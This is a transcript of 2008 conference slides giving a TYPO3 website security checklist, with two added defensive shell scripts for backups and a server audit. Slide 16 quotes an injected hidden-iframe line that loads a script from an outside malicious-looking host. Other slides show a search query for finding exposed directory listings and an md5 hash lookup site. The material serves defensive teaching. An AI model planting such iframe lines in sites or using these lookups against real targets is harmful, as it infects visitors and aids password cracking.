Avoiding the bad guys
Security Checklist for TYPO3
International TYPO3 Conference, Berlin, 2008
Transcript of "Security Checklist for TYPO3"

2. TYPO3 has quite a good security history...

3. but ...
   • TYPO3 is not „implement and forget“
   • Regular checks and updates are required

4. Secure Passwords
   • 9 or more characters
   • Mixed upper/lowercase
   • Do not use the same password everywhere
   • Change regularly
   • Passwords are stored as md5 hash, but...

5. md5.rednoize.com

6. md5 Hash Lookup

7. Disable Directory Listing
   • in httpd.conf change
     Options All Indexes FollowSymLinks
     to
     Options All FollowSymLinks
   • Google Search: intitle:"index of" "last modified" size

8. Backup Your Data
   • Regularly (cronjob)
   • Directories: fileadmin, typo3conf, uploads
   • Database: mysqldump --opt > filename
   • Not only for the last one or two days
   • Copy or download to external media
   • Verify!
   • Do not store inside docroot
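As an added example that is not part of the slides, the following POSIX shell script carries out the backup checklist of slide 8 in one cron job: it dumps the database with the slide's `mysqldump --opt`, archives fileadmin, typo3conf and uploads, verifies that the archive is readable and complete, keeps copies for more than a day or two, and refuses to write the backup anywhere inside the docroot. The docroot and backup paths, the database name `typo3db`, the `DUMP_CMD` override and the use of `~/.my.cnf` for the MySQL credentials are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the slides. Assumed layout (hypothetical): the TYPO3
# docroot is passed as $1, backups go to $2 (must lie outside the docroot), the
# MySQL database name is $3 and ~/.my.cnf holds the credentials so that
# "mysqldump --opt DB" needs no password on the command line.
# Assumed cron entry:
#   30 2 * * * /usr/local/bin/typo3-backup.sh /var/www/htdocs /var/backups/typo3 typo3db

# typo3_backup DOCROOT BACKUP_DIR DB_NAME [KEEP_DAYS]
# Writes typo3-<timestamp>.tar.gz containing fileadmin, typo3conf, uploads and
# the database dump, verifies the archive, prunes copies older than KEEP_DAYS
# (default 30, so more than "the last one or two days" survive) and prints the
# archive path. Returns non-zero on any failure.
typo3_backup() {
    docroot=$1; backup_dir=$2; db=$3; keep_days=${4:-30}
    # DUMP_CMD may be overridden (e.g. for testing); default is the slide's call.
    dump=${DUMP_CMD:-"mysqldump --opt"}

    mkdir -p "$backup_dir" || return 1
    # "Do not store inside docroot": anything below the docroot can be fetched
    # through the web server, so such a target is refused.
    case "$(cd "$backup_dir" && pwd)/" in
        "$(cd "$docroot" && pwd)/"*)
            echo "refusing: $backup_dir is inside $docroot" >&2; return 1 ;;
    esac

    work=$(mktemp -d) || return 1
    stamp=$(date +%Y%m%d-%H%M%S)
    archive=$backup_dir/typo3-$stamp.tar.gz

    # Database: mysqldump --opt > filename, written to a temp dir, not the docroot.
    if ! $dump "$db" > "$work/$db.sql"; then
        echo "database dump failed" >&2; rm -rf "$work"; return 1
    fi

    # The three directories from the slide plus the dump, in one archive.
    if ! tar -czf "$archive" -C "$docroot" fileadmin typo3conf uploads -C "$work" "$db.sql"; then
        echo "archive failed" >&2; rm -rf "$work"; return 1
    fi

    # "Verify!": the archive must be readable and contain every expected member.
    if ! tar -tzf "$archive" > "$work/members"; then
        echo "archive is unreadable" >&2; rm -rf "$work"; return 1
    fi
    for m in fileadmin typo3conf uploads "$db.sql"; do
        if ! grep -q "^$m" "$work/members"; then
            echo "verification failed: $m missing from $archive" >&2
            rm -rf "$work"; return 1
        fi
    done

    # Retention: remove archives older than KEEP_DAYS. Copying to external
    # media (the slide's next point) is left to a separate job.
    find "$backup_dir" -name 'typo3-*.tar.gz' -type f -mtime +"$keep_days" -exec rm -f {} \;
    rm -rf "$work"
    echo "$archive"
}

# Run directly: typo3-backup.sh DOCROOT BACKUP_DIR DB_NAME [KEEP_DAYS]
if [ "$#" -ge 3 ]; then
    typo3_backup "$@"
fi
```

The function exits non-zero as soon as the dump, the archive or the verification fails, so a cron job that mails on non-zero status reports a broken backup the same night instead of weeks later when a restore is needed.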
9. also check for www.domain.com/../system/ not being accessible

10. database.sql

11. md5.rednoize.com
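Slides 7 and 10 describe two conditions that can be verified on the server itself: an httpd.conf that still enables directory indexes, and a database dump such as database.sql (full of the md5 password hashes that slide 11 shows being looked up) sitting inside the docroot. The following POSIX shell audit, an added example rather than anything from the slides, checks both; the httpd.conf and docroot paths are placeholders.

```shell
#!/bin/sh
# Added example, not from the slides: a local audit for two checklist items.
# Paths are hypothetical; pass your own httpd.conf and docroot, e.g.:
#   ./typo3-audit.sh /etc/apache2/httpd.conf /var/www/htdocs

# check_directory_listing HTTPD_CONF
# Prints every "Options" line that still enables directory indexes ("Indexes",
# "+Indexes" or the catch-all "All") and returns 1 if any was found, 0 if none.
# Commented-out lines are skipped and "-Indexes" counts as fixed.
check_directory_listing() {
    awk '
        BEGIN { bad = 0 }
        tolower($1) == "options" {
            for (i = 2; i <= NF; i++) {
                o = tolower($i)
                if (o == "indexes" || o == "+indexes" || o == "all" || o == "+all") {
                    print FILENAME ":" NR ": " $0
                    bad = 1
                    break
                }
            }
        }
        END { exit bad }
    ' "$1"
}

# check_docroot_for_dumps DOCROOT
# A database.sql or backup archive inside the docroot can be downloaded by
# anyone who guesses or searches for the name. Lists such files and returns 1
# if any exist, 0 if the docroot is clean.
check_docroot_for_dumps() {
    hits=$(find "$1" -type f \( -name '*.sql' -o -name '*.sql.gz' \
                                -o -name '*.tar' -o -name '*.tar.gz' -o -name '*.zip' \))
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# Run directly: typo3-audit.sh HTTPD_CONF DOCROOT
if [ "$#" -eq 2 ]; then
    status=0
    check_directory_listing "$1" || status=1
    check_docroot_for_dumps "$2" || status=1
    exit "$status"
fi
```

Run it after every deployment or as a weekly cron job; a non-zero exit is the signal that one of the two slides' conditions has crept back in (for example a restored httpd.conf or a dump left behind by a migration).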
12. Backend Users
    • Editors should NEVER have admin rights
    • Check list of BE users for valid entries
    • Temporary editors (students, contract workers): set expiration date for account

13. FTP Accounts
    • Only give access to fileadmin/user_upload/...

14. When crisis strikes...

15. „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their "greeting".“

16. iframe Attacks
    <iframe src='http:// ccfelomv hk.com/ dl/adv54 2.php' width=1 height=1> </iframe>

17. Link Manipulation
    • www.domain.com/index.php&L=2&www.badsite.com
    • Limit range of linkVars:
      config.linkVars = L(0-4)

18. Further Information
    • TYPO3 Security Cookbook, available at typo3.org/teams/security/
    • TYPO3 announce list, available at lists.netfielders.de

19. Questions ?
